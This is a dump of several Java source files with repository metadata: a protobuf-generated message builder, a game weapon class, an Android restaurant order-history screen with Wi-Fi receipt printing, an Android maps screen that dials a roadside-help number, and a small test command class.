Diadoc.Api.Proto.Documents.DocumentProtocolProtos.DocumentProtocol.class, Diadoc.Api.Proto.Documents.DocumentProtocolProtos.DocumentProtocol.Builder.class); } // Construct using Diadoc.Api.Proto.Documents.DocumentProtocolProtos.DocumentProtocol.newBuilder() private Builder() { maybeForceBuilderInitialization(); } private Builder( com.google.protobuf.GeneratedMessage.BuilderParent parent) { super(parent); maybeForceBuilderInitialization(); } private void maybeForceBuilderInitialization() { if (com.google.protobuf.GeneratedMessage.alwaysUseFieldBuilders) { } } private static Builder create() { return new Builder(); } public Builder clear() { super.clear(); printForm_ = com.google.protobuf.ByteString.EMPTY; bitField0_ = (bitField0_ & ~0x00000001); signature_ = com.google.protobuf.ByteString.EMPTY; bitField0_ = (bitField0_ & ~0x00000002); return this; } public Builder clone() { return create().mergeFrom(buildPartial()); } public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return Diadoc.Api.Proto.Documents.DocumentProtocolProtos.internal_static_Diadoc_Api_Proto_Documents_DocumentProtocol_descriptor; } public Diadoc.Api.Proto.Documents.DocumentProtocolProtos.DocumentProtocol getDefaultInstanceForType() { return Diadoc.Api.Proto.Documents.DocumentProtocolProtos.DocumentProtocol.getDefaultInstance(); } public Diadoc.Api.Proto.Documents.DocumentProtocolProtos.DocumentProtocol build() { Diadoc.Api.Proto.Documents.DocumentProtocolProtos.DocumentProtocol result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } public Diadoc.Api.Proto.Documents.DocumentProtocolProtos.DocumentProtocol buildPartial() { Diadoc.Api.Proto.Documents.DocumentProtocolProtos.DocumentProtocol result = new Diadoc.Api.Proto.Documents.DocumentProtocolProtos.DocumentProtocol(this); int from_bitField0_ = bitField0_; int to_bitField0_ = 0; if (((from_bitField0_ & 0x00000001) == 0x00000001)) { to_bitField0_ |= 0x00000001; } result.printForm_ = printForm_; if (((from_bitField0_ & 0x00000002) == 0x00000002)) { to_bitField0_ |= 0x00000002; } result.signature_ = signature_; result.bitField0_ = to_bitField0_; onBuilt(); return result; } public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof Diadoc.Api.Proto.Documents.DocumentProtocolProtos.DocumentProtocol) { return mergeFrom((Diadoc.Api.Proto.Documents.DocumentProtocolProtos.DocumentProtocol)other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(Diadoc.Api.Proto.Documents.DocumentProtocolProtos.DocumentProtocol other) { if (other == Diadoc.Api.Proto.Documents.DocumentProtocolProtos.DocumentProtocol.getDefaultInstance()) return this; if (other.hasPrintForm()) { setPrintForm(other.getPrintForm()); } if (other.hasSignature()) { setSignature(other.getSignature()); } this.mergeUnknownFields(other.getUnknownFields()); return this; } public final boolean isInitialized() { if (!hasPrintForm()) { return false; } if (!hasSignature()) { return false; } return true; } public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { Diadoc.Api.Proto.Documents.DocumentProtocolProtos.DocumentProtocol parsedMessage = null; try { parsedMessage = PARSER.parsePartialFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { parsedMessage = (Diadoc.Api.Proto.Documents.DocumentProtocolProtos.DocumentProtocol) e.getUnfinishedMessage(); throw e; } finally { if (parsedMessage != null) { mergeFrom(parsedMessage); } } return this; } private int bitField0_; private com.google.protobuf.ByteString printForm_ = com.google.protobuf.ByteString.EMPTY; /** * <code>required bytes PrintForm = 1;</code> */ public boolean hasPrintForm() { return ((bitField0_ & 0x00000001) == 0x00000001); } /** * <code>required bytes PrintForm = 1;</code> */ public com.google.protobuf.ByteString getPrintForm() { return printForm_; } /** * <code>required bytes PrintForm = 1;</code> */ public Builder setPrintForm(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } bitField0_ |= 0x00000001; printForm_ = value; onChanged(); return this; } /** * <code>required bytes PrintForm = 1;</code> */ public Builder clearPrintForm() { bitField0_ = (bitField0_ & ~0x00000001); printForm_ = getDefaultInstance().getPrintForm(); onChanged(); return this; } private com.google.protobuf.ByteString signature_ = com.google.protobuf.ByteString.EMPTY; /** * <code>required bytes Signature = 2;</code> */ public boolean hasSignature() { return ((bitField0_ & 0x00000002) == 0x00000002); } /** * <code>required bytes Signature = 2;</code> */ public com.google.protobuf.ByteString getSignature() { return signature_; } /** * <code>required bytes Signature = 2;</code> */ public Builder setSignature(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } bitField0_ |= 0x00000002; signature_ = value; onChanged(); return this; } /** * <code>required bytes Signature = 2;</code> */ public Builder clearSignature() { bitField0_ = (bitField0_ & ~0x00000002); signature_ = getDefaultInstance().getSignature(); onChanged(); return this; } // @@protoc_insertion_point(builder_scope:Diadoc.Api.Proto.Documents.DocumentProtocol) } static { defaultInstance = new DocumentProtocol(true); defaultInstance.initFields(); } // @@protoc_insertion_point(class_scope:Diadoc.Api.Proto.Documents.DocumentProtocol) } private static final com.google.protobuf.Descriptors.Descriptor internal_static_Diadoc_Api_Proto_Documents_DocumentProtocol_descriptor; private static com.google.protobuf.GeneratedMessage.FieldAccessorTable internal_static_Diadoc_Api_Proto_Documents_DocumentProtocol_fieldAccessorTable; public static com.google.protobuf.Descriptors.FileDescriptor getDescriptor() { return descriptor; } private static com.google.protobuf.Descriptors.FileDescriptor descriptor; static { java.lang.String[] descriptorData = { "\n Documents/DocumentProtocol.proto\022\032Diad" + "oc.Api.Proto.Documents\"8\n\020DocumentProtoc" + "ol\022\021\n\tPrintForm\030\001 \002(\014\022\021\n\tSignature\030\002 \002(\014" + "B\030B\026DocumentProtocolProtos" }; com.google.protobuf.Descriptors.FileDescriptor.InternalDescriptorAssigner assigner = new com.google.protobuf.Descriptors.FileDescriptor. InternalDescriptorAssigner() { public com.google.protobuf.ExtensionRegistry assignDescriptors( com.google.protobuf.Descriptors.FileDescriptor root) { descriptor = root; return null; } }; com.google.protobuf.Descriptors.FileDescriptor .internalBuildGeneratedFileFrom(descriptorData, new com.google.protobuf.Descriptors.FileDescriptor[] { }, assigner); internal_static_Diadoc_Api_Proto_Documents_DocumentProtocol_descriptor = getDescriptor().getMessageTypes().get(0); internal_static_Diadoc_Api_Proto_Documents_DocumentProtocol_fieldAccessorTable = new com.google.protobuf.GeneratedMessage.FieldAccessorTable( internal_static_Diadoc_Api_Proto_Documents_DocumentProtocol_descriptor, new java.lang.String[] { "PrintForm", "Signature", }); } // @@protoc_insertion_point(outer_class_scope) }
[ "harl_aa@skbkontur.ru" ]
harl_aa@skbkontur.ru
751952724d0bf69ccd8ac35130616786f32a49ab
c6cc39476364cd6168e07f44be3dbd01fdbe7f8c
/StandardWeapon.java
9486d6c10c2df25f706030c07a049cd3b5b2ab0c
[]
no_license
Nova711/devoid
e4d941cc085447b8a4e7f8e7807c07584b6a7bce
fe054e05da1a47732afeb4d923042fa574d19210
refs/heads/master
2020-09-23T07:09:48.391460
2020-05-30T04:00:26
2020-05-30T04:00:26
225,435,078
0
0
null
null
null
null
UTF-8
Java
false
false
1,711
java
package devoid_boosted; import java.awt.Color; import java.awt.Graphics; import java.awt.Graphics2D; public class StandardWeapon extends StandardShipComponent implements Weapon { private int projectileType; private double rateOfFire; private double reloadTime; private int clipSize; public StandardWeapon() { } public StandardWeapon(Vector position, double angle, PhysicsBox environment) { super(position, new Vector(0, 0), 5, angle, 5, 1, 0, 0, environment); } @Override public void update() { // TODO Auto-generated method stub } @Override public void impact(DObject obj, CollisionEvent e) { // TODO Auto-generated method stub } @Override public boolean hits(DObject objects) { // TODO Auto-generated method stub return false; } @Override public int getProjectileType() { return this.projectileType; } public void setProjectileType(int type) { this.projectileType = type; } @Override public int getSizeClass() { // TODO Auto-generated method stub return 0; } @Override public double getRateOfFire() { return this.reloadTime; } public void setRateOfFire(double rateOfFire) { this.rateOfFire = rateOfFire; } @Override public double getReloadTime() { return this.reloadTime; } public void setReloadTime(double time) { this.reloadTime = time; } @Override public int getClipSize() { return this.clipSize; } public void setClipSize(int size) { this.clipSize = size; } @Override public void fire(double angle) { this.getEnvironment() .spawn(new Bullet(this.getPosition(), new Vector(this.getVelocity().angle, this.getVelocity().getMagnitude() + 20), this.getAngle() + angle, this.getEnvironment())); } }
[ "39838626+Nova711@users.noreply.github.com" ]
39838626+Nova711@users.noreply.github.com
d4a85d839301a4123b3ae20fe91fa801ef7dcb32
96ccaa8610e64c511e9805f69482afd8d9c877b8
/app/src/main/java/com/demos/param/ashtrestoant/History.java
0039ef0762b982e66aa0bed8201e342ae8cbdde3
[]
no_license
raj-savaj/restaurants
ccec9a02a5b3b139055c76307e4a9a83f39bab64
26e60f489ecd77f7fa6b739531b6929f11773dca
refs/heads/master
2022-09-06T17:45:22.194169
2020-05-29T05:22:53
2020-05-29T05:22:53
267,771,961
0
0
null
null
null
null
UTF-8
Java
false
false
14,054
java
package com.demos.param.ashtrestoant; import android.app.Dialog; import android.content.Intent; import android.database.Cursor; import android.os.Handler; import android.os.Message; import android.support.v7.app.AppCompatActivity; import android.os.Bundle; import android.support.v7.widget.LinearLayoutManager; import android.support.v7.widget.RecyclerView; import com.demos.param.ashtrestoant.Adapter.History_Adapter; import com.demos.param.ashtrestoant.Adapter.History_Order_Item; import com.demos.param.ashtrestoant.DB.DaoSession; import com.demos.param.ashtrestoant.DB.Order; import com.demos.param.ashtrestoant.Services.WifiCommunication; import com.kunzisoft.switchdatetime.SwitchDateTimeDialogFragment; import org.greenrobot.greendao.database.Database; import android.util.Log; import android.view.Menu; import android.view.MenuItem; import android.view.View; import android.view.ViewGroup; import android.view.Window; import android.widget.Button; import android.widget.ImageView; import android.widget.TextView; import android.widget.Toast; import java.text.DateFormat; import java.text.ParseException; import java.text.SimpleDateFormat; import java.util.ArrayList; import java.util.Calendar; import java.util.Date; import java.util.GregorianCalendar; import java.util.List; import java.util.Locale; import java.util.TimeZone; public class History extends AppCompatActivity implements History_Adapter.ItemClickListen { DaoSession daoSession; List<Order> orderList; RecyclerView rcvhis; History_Adapter history_adapter; Dialog dialog; Dialog dialog_detail; private SwitchDateTimeDialogFragment dateTimeFragment; private static final String TAG_DATETIME_FRAGMENT = "TAG_DATETIME_FRAGMENT"; TextView txtsdate,txtedate; Button dbtnok,dbtncan; boolean chksdate=false,chkedate=false; Calendar calendar; Database db; TextView tabelname,tot_Amount; ImageView prtintbtn; RecyclerView rcy_dialog; int connFlag=0; History.revMsgThread revThred = null; WifiCommunication wfComm = null; Session s; String BILL = ""; String[] bill=new String[3]; @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_history); s=new Session(getApplicationContext()); rcvhis=findViewById(R.id.rcv_his); getSupportActionBar().setTitle("Order History"); rcvhis.setLayoutManager(new LinearLayoutManager(this)); orderList=new ArrayList<>(); history_adapter=new History_Adapter(orderList,this); daoSession = ((App) getApplication()).getDaoSession(); db = ((App) getApplication()).getDaoSession().getDatabase(); Cursor cursor = db.rawQuery("SELECT sum(QTY*PRICE) as total,TBNAME,OID,TIME FROM `ORDER` GROUP BY OID ORDER BY OID DESC", null); cursor.moveToFirst(); while (!cursor.isAfterLast()) { SimpleDateFormat dateFormat = new SimpleDateFormat("yyyy-MM-dd HH:mm"); String date=""; try { Date d = dateFormat.parse(cursor.getString(3)); DateFormat dateFormatdb = new SimpleDateFormat("hh:mm a \ndd-MM-yyyy"); date=String.valueOf(dateFormatdb.format(d)); } catch (ParseException e) { e.printStackTrace(); } Order order=new Order(cursor.getString(2),cursor.getString(1),cursor.getInt(0),date); orderList.add(order); cursor.moveToNext(); } cursor.close(); rcvhis.setAdapter(history_adapter); history_adapter.notifyDataSetChanged(); dateTimeFragment = (SwitchDateTimeDialogFragment) getSupportFragmentManager().findFragmentByTag(TAG_DATETIME_FRAGMENT); if(dateTimeFragment == null) { dateTimeFragment = SwitchDateTimeDialogFragment.newInstance( getString(R.string.label_datetime_dialog), getString(android.R.string.ok), getString(android.R.string.cancel) ); } // Optionally define a timezone dateTimeFragment.setTimeZone(TimeZone.getDefault()); // Init format final SimpleDateFormat myDateFormat = new SimpleDateFormat("yyyy-MM-dd HH:mm", java.util.Locale.getDefault()); // Assign unmodifiable values dateTimeFragment.set24HoursMode(false); dateTimeFragment.setHighlightAMPMSelection(false); dateTimeFragment.setMinimumDateTime(new GregorianCalendar(2015, Calendar.JANUARY, 1).getTime()); dateTimeFragment.setMaximumDateTime(new GregorianCalendar(2025, Calendar.DECEMBER, 31).getTime()); // Define new day and month format try { dateTimeFragment.setSimpleDateMonthAndDayFormat(new SimpleDateFormat("MMMM dd", Locale.getDefault())); } catch (SwitchDateTimeDialogFragment.SimpleDateMonthAndDayFormatException e) { } dialog = new Dialog(History.this); dialog.requestWindowFeature(Window.FEATURE_NO_TITLE); dialog.setContentView(R.layout.dialog_date); Window window = dialog.getWindow(); window.setLayout(ViewGroup.LayoutParams.MATCH_PARENT, ViewGroup.LayoutParams.WRAP_CONTENT); dialog_detail= new Dialog(History.this); dialog_detail.requestWindowFeature(Window.FEATURE_NO_TITLE); dialog_detail.setContentView(R.layout.dialog_order); dialog_detail.getWindow().setLayout(ViewGroup.LayoutParams.MATCH_PARENT, ViewGroup.LayoutParams.WRAP_CONTENT);; txtsdate = (TextView) dialog.findViewById(R.id.text_sdate); txtedate=(TextView)dialog.findViewById(R.id.text_edate); dbtnok=(Button)dialog.findViewById(R.id.okbtn); dbtncan=(Button)dialog.findViewById(R.id.canbtn); tabelname=(TextView) dialog_detail.findViewById(R.id.tabelname); rcy_dialog=(RecyclerView)dialog_detail.findViewById(R.id.rcy_dialog); rcy_dialog.setLayoutManager(new LinearLayoutManager(this)); prtintbtn=(ImageView)dialog_detail.findViewById(R.id.prtintbtn); tot_Amount=(TextView)dialog_detail.findViewById(R.id.tot_Amount); calendar=Calendar.getInstance(); txtsdate.setOnClickListener(new View.OnClickListener() { @Override public void onClick(View v) { if(!chksdate) { dateTimeFragment.startAtCalendarView(); dateTimeFragment.setDefaultDateTime(calendar.getTime()); dateTimeFragment.show(getSupportFragmentManager(), TAG_DATETIME_FRAGMENT); chksdate=true; } } }); txtedate.setOnClickListener(new View.OnClickListener() { @Override public void onClick(View v) { if(!chkedate) { dateTimeFragment.startAtCalendarView(); dateTimeFragment.setDefaultDateTime(calendar.getTime()); dateTimeFragment.show(getSupportFragmentManager(), TAG_DATETIME_FRAGMENT); chkedate=true; } } }); dbtncan.setOnClickListener(new View.OnClickListener() { @Override public void onClick(View v) { dialog.dismiss(); } }); dbtnok.setOnClickListener(new View.OnClickListener() { @Override public void onClick(View v) { if(!txtsdate.getText().equals("") && !txtedate.getText().equals("")) { String sql="delete from `ORDER` where `TIME` between '"+txtsdate.getText().toString()+"' AND '"+txtedate.getText().toString()+"'"; db.execSQL(sql); RefreshData(); } dialog.dismiss(); } }); dateTimeFragment.setOnButtonClickListener(new SwitchDateTimeDialogFragment.OnButtonWithNeutralClickListener() { @Override public void onPositiveButtonClick(Date date) { if(chksdate) { chksdate=false; txtsdate.setText(myDateFormat.format(date)); } if(chkedate) { chkedate=false; txtedate.setText(myDateFormat.format(date)); } } @Override public void onNegativeButtonClick(Date date) { if(chksdate) { chksdate=false; } if(chkedate) { chkedate=false; } } @Override public void onNeutralButtonClick(Date date) { } }); prtintbtn.setOnClickListener(new View.OnClickListener() { @Override public void onClick(View v) { wfComm = new WifiCommunication(mHandler); wfComm.initSocket(s.getPrinterIp(), 9100,bill); dialog_detail.dismiss(); } }); } @Override public boolean onCreateOptionsMenu(Menu menu) { // Inflate the menu; this adds items to the action bar if it is present. getMenuInflater().inflate(R.menu.delete, menu); return true; } @Override public boolean onOptionsItemSelected(MenuItem item) { int id = item.getItemId(); switch (id){ case R.id.delete: dialog.show(); return true; default: return super.onOptionsItemSelected(item); } } public void RefreshData() { orderList.clear(); Cursor cursor = db.rawQuery("SELECT sum(QTY*PRICE) as total,TBNAME,OID,TIME FROM `ORDER` GROUP BY OID ORDER BY OID DESC", null); cursor.moveToFirst(); while (!cursor.isAfterLast()) { SimpleDateFormat dateFormat = new SimpleDateFormat("yyyy-MM-dd HH:mm"); String date=""; try { Date d = dateFormat.parse(cursor.getString(3)); DateFormat dateFormatdb = new SimpleDateFormat("hh:mm a \ndd-MM-yyyy"); date=String.valueOf(dateFormatdb.format(d)); } catch (ParseException e) { e.printStackTrace(); } Order order=new Order(cursor.getString(2),cursor.getString(1),cursor.getInt(0),date); orderList.add(order); cursor.moveToNext(); } history_adapter.notifyDataSetChanged(); } @Override public void orderItemClick(View v, int position) { Order o=orderList.get(position); tabelname.setText(o.getTbname()); tot_Amount.setText(""+o.getPrice()); bill[0]=o.getTbname(); List<Order> itemlist=new ArrayList<>(); Cursor cursor = db.rawQuery("SELECT * FROM `ORDER`WHERE OID ='"+o.getOid()+"'", null); cursor.moveToFirst(); while (!cursor.isAfterLast()) { Order order=new Order(cursor.getString(0), cursor.getInt(1), cursor.getString(2),cursor.getInt(3),cursor.getString(4), cursor.getInt(5), cursor.getInt(6), cursor.getString(7), cursor.getString(8)); BILL = BILL + String.format("%-35s %-7s %7s %7s\n", ""+o.getName()+"", ""+o.getQty()+"", ""+o.getPrice()+"", ""+o.getQty()*o.getPrice()+""); itemlist.add(order); cursor.moveToNext(); } bill[1]=BILL; bill[2]=String.valueOf(o.getPrice()); History_Order_Item historyOrderItem=new History_Order_Item(itemlist); rcy_dialog.setAdapter(historyOrderItem); dialog_detail.show(); cursor.close(); } Handler mHandler = new Handler() { public void handleMessage(Message msg) { switch (msg.what) { case 0: connFlag = 0; revThred = new History.revMsgThread(); revThred.start(); Intent i=new Intent(History.this,Productview.class); startActivity(i); finish(); return; case 1: Toast.makeText(History.this, "Disconnect the WIFI-printer successful", Toast.LENGTH_SHORT).show(); revThred.interrupt(); return; case 2: connFlag = 0; Toast.makeText(History.this, "Connect the WIFI-printer error", Toast.LENGTH_SHORT).show(); return; case 4: connFlag = 0; Toast.makeText(History.this, "Send Data Failed,please reconnect", Toast.LENGTH_SHORT).show(); revThred.interrupt(); return; case 6: if (((((byte) Integer.parseInt(msg.obj.toString())) >> 6) & 1) == 1) { Toast.makeText(History.this, "The printer has no paper", Toast.LENGTH_LONG).show(); return; } return; default: return; } } }; class revMsgThread extends Thread { revMsgThread() { } public void run() { try { Message msg = new Message(); while (true) { int revData = wfComm.revByte(); if (revData != -1) { msg = mHandler.obtainMessage(6); msg.obj = Integer.valueOf(revData); mHandler.sendMessage(msg); } Thread.sleep(20); } } catch (InterruptedException e) { e.printStackTrace(); Log.e("wifi调试","eror"+e.getMessage()); } } } }
[ "rsavaj7@gmail.com" ]
rsavaj7@gmail.com
557448c07965081da0c45a2dc3fd6789bdd35e02
d4bb5c16a5b4cf76ea294ac13a6542ceb6ff22f5
/app/src/main/java/dunmow/meng/pechhulp/controllers/MapsActivity.java
f58d37999b0452af6f2b1f42263372b56cb6110b
[]
no_license
scrtsrc/LocationCaller
24c4c0a44ebccf3884398ae89975138735faebcb
3ceeabb6b6371e32651523cec472573d797859fb
refs/heads/master
2021-09-12T02:01:53.035881
2018-04-13T13:51:57
2018-04-13T13:51:57
null
0
0
null
null
null
null
UTF-8
Java
false
false
12,484
java
package dunmow.meng.pechhulp.controllers; import android.Manifest; import android.app.Activity; import android.content.Context; import android.content.Intent; import android.content.pm.PackageManager; import android.graphics.Color; import android.graphics.drawable.BitmapDrawable; import android.graphics.drawable.Drawable; import android.location.Address; import android.location.Geocoder; import android.location.Location; import android.net.Uri; import android.support.annotation.NonNull; import android.support.v4.app.ActivityCompat; import android.os.Bundle; import android.support.v7.app.AppCompatActivity; import android.text.Spannable; import android.text.SpannableString; import android.text.style.ImageSpan; import android.util.Log; import android.view.Gravity; import android.view.LayoutInflater; import android.view.View; import android.widget.Button; import android.widget.LinearLayout; import android.widget.PopupWindow; import android.widget.RelativeLayout; import android.widget.TextView; import com.google.android.gms.location.FusedLocationProviderClient; import com.google.android.gms.location.LocationServices; import com.google.android.gms.maps.CameraUpdateFactory; import com.google.android.gms.maps.GoogleMap.InfoWindowAdapter; import com.google.android.gms.maps.GoogleMap; import com.google.android.gms.maps.OnMapReadyCallback; import com.google.android.gms.maps.SupportMapFragment; import com.google.android.gms.maps.model.BitmapDescriptor; import com.google.android.gms.maps.model.BitmapDescriptorFactory; import com.google.android.gms.maps.model.LatLng; import com.google.android.gms.maps.model.Marker; import com.google.android.gms.maps.model.MarkerOptions; import com.google.android.gms.tasks.OnFailureListener; import com.google.android.gms.tasks.OnSuccessListener; import java.io.IOException; import java.util.List; import java.util.Locale; import dunmow.meng.pechhulp.R; import dunmow.meng.pechhulp.helpers.ScreenSizeHelper; public class MapsActivity extends AppCompatActivity implements OnMapReadyCallback { //Member variables private GoogleMap mMap; private Location mCurrentLocation; private Button mBtnRing; private FusedLocationProviderClient mFusedLocationClient; @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_maps); mFusedLocationClient = LocationServices.getFusedLocationProviderClient(this); getCurrentLocation(); //Sets up ringing button mBtnRing = findViewById(R.id.btnRing); mBtnRing.setOnClickListener(new View.OnClickListener() { @Override public void onClick(View view) { showPopup(MapsActivity.this); } }); //Set up layout differently if is a tablet ScreenSizeHelper screenSizeHelper = new ScreenSizeHelper(this); if (screenSizeHelper.isTabletScreen()) { setupTabletLayout(); } } /** * Set up the specific features for tablet layouts. */ private void setupTabletLayout() { RelativeLayout relaLayMap = findViewById(R.id.relaLayMap); //Removing the view that held the button in the mobile layout relaLayMap.removeViewInLayout(findViewById(R.id.linLayBottom)); ScreenSizeHelper screenHelper = new ScreenSizeHelper(this); //Creating a new relative layout that will hold the information about the call RelativeLayout relaLayCall = new RelativeLayout(this); //Relative layout will be centred at the bottom of the screen RelativeLayout.LayoutParams relaLayCallParams = new RelativeLayout.LayoutParams(RelativeLayout.LayoutParams.MATCH_PARENT, screenHelper.getScreenSizeDp() / 2); relaLayCallParams.addRule(RelativeLayout.ALIGN_PARENT_BOTTOM); relaLayCallParams.addRule(RelativeLayout.CENTER_HORIZONTAL); relaLayCall.setLayoutParams(relaLayCallParams); relaLayCall.setBackgroundColor(getResources().getColor(R.color.colorPrimary)); relaLayCall.setAlpha(0.75f); relaLayMap.addView(relaLayCall); //A linear layout will be placed inside of the relative layout, which will hold the text information LinearLayout linLayCallTxt = new LinearLayout(this); linLayCallTxt.setGravity(Gravity.CENTER); linLayCallTxt.setOrientation(LinearLayout.VERTICAL); //Place a margin around the text RelativeLayout.LayoutParams relaLayParams = new RelativeLayout.LayoutParams(LinearLayout.LayoutParams.MATCH_PARENT, LinearLayout.LayoutParams.MATCH_PARENT); relaLayParams.setMargins(20, 10, 20, 10); relaLayParams.addRule(Gravity.CENTER); relaLayCall.addView(linLayCallTxt, relaLayParams); TextView title = new TextView(this); title.setText(getResources().getString(R.string.call_title)); title.setGravity(Gravity.CENTER); title.setTextSize(20); TextView phone = new TextView(this); SpannableString ss = new SpannableString(" " + getResources().getString(R.string.phone_number)); Drawable d = getResources().getDrawable(R.drawable.main_btn_tel); d.setBounds(0, 0, 60, 60); ImageSpan span = new ImageSpan(d, ImageSpan.ALIGN_BASELINE); ss.setSpan(span, 0, 1, Spannable.SPAN_INCLUSIVE_EXCLUSIVE); phone.setText(ss); phone.setGravity(Gravity.CENTER); phone.setTextSize(20); TextView price = new TextView(this); price.setGravity(Gravity.CENTER); price.setText(getResources().getString(R.string.call_price)); LinearLayout.LayoutParams linLayParams = new LinearLayout.LayoutParams(LinearLayout.LayoutParams.MATCH_PARENT, LinearLayout.LayoutParams.WRAP_CONTENT); linLayParams.setMargins(0, 10, 0, 10); linLayCallTxt.addView(title, linLayParams); linLayCallTxt.addView(phone, linLayParams); linLayCallTxt.addView(price, linLayParams); } /** * Checks permission and tries to get current location if received. Sets mCurrentLocation from the result. */ private void getCurrentLocation() { if (ActivityCompat.checkSelfPermission(this, Manifest.permission.ACCESS_FINE_LOCATION) != PackageManager.PERMISSION_GRANTED && ActivityCompat.checkSelfPermission(this, Manifest.permission.ACCESS_COARSE_LOCATION) != PackageManager.PERMISSION_GRANTED) { ActivityCompat.requestPermissions(this, new String[]{Manifest.permission.ACCESS_COARSE_LOCATION, Manifest.permission.ACCESS_FINE_LOCATION}, 1); } mFusedLocationClient.getLastLocation() .addOnSuccessListener(new OnSuccessListener<Location>() { @Override public void onSuccess(Location location) { // GPS location can be null if GPS is switched off if (location != null) { mCurrentLocation = location; // Obtain the SupportMapFragment and get notified when the map is ready to be used. SupportMapFragment mapFragment = (SupportMapFragment) getSupportFragmentManager() .findFragmentById(R.id.map); mapFragment.getMapAsync(MapsActivity.this); } } }) .addOnFailureListener(new OnFailureListener() { @Override public void onFailure(@NonNull Exception e) { e.printStackTrace(); } }); } /** * Sets a marker to the location of the person if there is one. */ @Override public void onMapReady(GoogleMap googleMap) { mMap = googleMap; mMap.setMapType(GoogleMap.MAP_TYPE_NORMAL); //Place current location marker final LatLng currentLocationLatLng = new LatLng(mCurrentLocation.getLatitude(), mCurrentLocation.getLongitude()); MarkerOptions markerOptions = new MarkerOptions(); BitmapDescriptor markerPopup = BitmapDescriptorFactory.fromResource(R.drawable.map_marker); markerOptions.position(currentLocationLatLng).icon(markerPopup); Marker currentLocationMarker = mMap.addMarker(markerOptions); mMap.moveCamera(CameraUpdateFactory.newLatLngZoom(currentLocationLatLng, 13)); // Setting a custom info window adapter for the google map mMap.setInfoWindowAdapter(new InfoWindowAdapter() { // Use default InfoWindow frame @Override public View getInfoWindow(Marker marker) { View popupView = getLayoutInflater().inflate(R.layout.location_window_popup, null); TextView address = popupView.findViewById(R.id.txtVwAddress); String addressString = currentLocationLatLng.latitude + " , " + currentLocationLatLng.longitude; //Setting marker popup to display the address, if none is found will set it to gps location if (getAddressFromLatLng(currentLocationLatLng) != null) { addressString = getAddressFromLatLng(currentLocationLatLng); } address.setText(addressString); // Returning the view containing InfoWindow contents return popupView; } // Defines the contents of the InfoWindow @Override public View getInfoContents(Marker arg0) { return null; } }); currentLocationMarker.showInfoWindow(); } /** * Method to get nearest address using gps location given. * * @param latLng * @return string of the address. */ public String getAddressFromLatLng(LatLng latLng) { Geocoder geocoder = new Geocoder(getApplicationContext(), Locale.getDefault()); try { List<Address> addresses = geocoder.getFromLocation(latLng.latitude, latLng.longitude, 1); if (addresses != null && !addresses.isEmpty()) { return (addresses.get(0).getAddressLine(0)); } else { return null; } } catch (IllegalArgumentException iae) { Log.e("GC IllegalArgument: ", iae.getMessage()); } catch (IOException ioe) { Log.e("GC IOException: ", ioe.getMessage()); } return null; } /** * Method for confirming call popup dialogue. */ private void showPopup(final Activity context) { //Hide the call button mBtnRing.setVisibility(View.GONE); // Inflate the popup_layout.xml LinearLayout linLayViewGroup = context.findViewById(R.id.linLayPopup); LayoutInflater layoutInflater = (LayoutInflater) context .getSystemService(Context.LAYOUT_INFLATER_SERVICE); View layoutVw = layoutInflater.inflate(R.layout.call_confirm_window, linLayViewGroup); // Creating the Popup Window final PopupWindow confirmCallPopup = new PopupWindow(context); confirmCallPopup.setContentView(layoutVw); confirmCallPopup.setFocusable(true); confirmCallPopup.setHeight(650); confirmCallPopup.setWidth(750); // Clear the default translucent background confirmCallPopup.setBackgroundDrawable(new BitmapDrawable()); // Displaying the popup at the specified location, + offsets. confirmCallPopup.showAtLocation(layoutVw, Gravity.BOTTOM, 0, 30); LinearLayout linLayCancelGroup = layoutVw.findViewById(R.id.linLayCancel); linLayCancelGroup.setOnClickListener(new View.OnClickListener() { @Override public void onClick(View v) { confirmCallPopup.dismiss(); mBtnRing.setVisibility(View.VISIBLE); } }); Button bntCallConfirm = layoutVw.findViewById(R.id.btnRingConfirm); bntCallConfirm.setOnClickListener(new View.OnClickListener() { @Override public void onClick(View view) { Intent intent = new Intent(Intent.ACTION_DIAL, Uri.parse("tel:" + "+319007788990")); startActivity(intent); confirmCallPopup.dismiss(); } }); } }
[ "mtdunmow@gmail.com" ]
mtdunmow@gmail.com
5b0d8664e9f56c6e5aa9693cc158c9242bcec5b9
4e080e5a2fb4cd490891b40a85c1237b079f59c9
/backend/back-end-protocolo/src/test/java/com/linecode/bdd/protocolo/cmd/AvaliarProtocoloCmdTest.java
4271403d208c4723245149e9bba878a1e925275e
[]
no_license
Jownao/lab-engenharia-software
88ffbd6ba4a3568623c643984d77f8e045db2c31
e8f54b537643d70e39fb13505c1882f002863827
refs/heads/master
2023-07-20T20:20:39.824247
2019-11-19T21:05:35
2019-11-19T21:05:35
null
0
0
null
null
null
null
UTF-8
Java
false
false
448
java
package com.linecode.bdd.protocolo.cmd; import com.linecode.protocolo.cmd.AvaliarProtocoloCmd; public class AvaliarProtocoloCmdTest extends AvaliarProtocoloCmd { private String msgEsperada; public AvaliarProtocoloCmdTest(boolean deferido, String descricao, long idProtocolo, String msgEsperada) { super(deferido, descricao, idProtocolo); this.msgEsperada = msgEsperada; } public String getMsgEsperada() { return msgEsperada; } }
[ "igorjoaquim.pg@gmail.com" ]
igorjoaquim.pg@gmail.com
b268f564800e3666ce5f71f1b8c0997a41cb7f9f
37247c87c8dca32da61d0fdfae8d52e08f587899
/src/main/java/com/navi/repository/FeedbackRepository.java
ed9cfe339a4f77413daceda22e2bb960055b9241
[]
no_license
fengla/vinagator
a5367be46693d0bff9fa6fcf9af1be19dcc5e0a9
05dd68042ab27fe3b5e5630de5a9517f945c261a
refs/heads/master
2020-03-22T05:15:09.939227
2018-08-09T16:05:44
2018-08-09T16:05:44
139,552,901
0
0
null
null
null
null
UTF-8
Java
false
false
807
java
